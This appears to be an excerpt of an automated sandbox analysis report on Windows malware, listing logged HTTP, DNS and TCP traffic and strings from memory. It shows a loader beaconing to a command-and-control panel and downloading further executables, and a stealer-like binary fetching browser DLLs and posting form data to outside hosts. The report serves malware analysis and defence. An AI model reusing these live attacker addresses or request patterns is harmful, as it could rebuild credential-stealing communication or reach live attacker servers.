Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 198.46.178.145 198.46.178.145
Source: Joe Sandbox View	IP Address: 77.91.101.71 77.91.101.71
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDGHCAAKECFHJKFIJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAKFCGIJKJKFHIDHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 6789Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709PyrbqHMCEioUh%2Blkv89lRN48Nn9a3rmWypKncjDf9lPiVhJRxR02Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 96Host: vaniloin.fun
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBFBFIIJDAKECAKKJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 2681Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_008FBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_008FBD60

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/server.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/build_2024-07-25_20-56.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache

Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 157.123.68.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: vaniloin.fun
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/3405117-2476756634-1003
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/G
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3354999318.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php00019001
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3R
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6323e228833c10fe3eb39f1caffb81382ae#xe
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUsers
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpft
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded(1
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedZ1
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedy1
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3354999318.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/build_2024-07-25_20-56.exe
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/build_2024-07-25_20-56.exeq
Source: axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/server.exe
Source: axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/server.exe9c5867ded
Source: axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/server.exe9c5867ee8
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/server.exel
Source: axplong.exe, 00000007.00000002.3354999318.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/server.exey
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.0000000019010000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exe
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exenderbird
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.KFHJJJKKFH
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://arpdabl.zapto
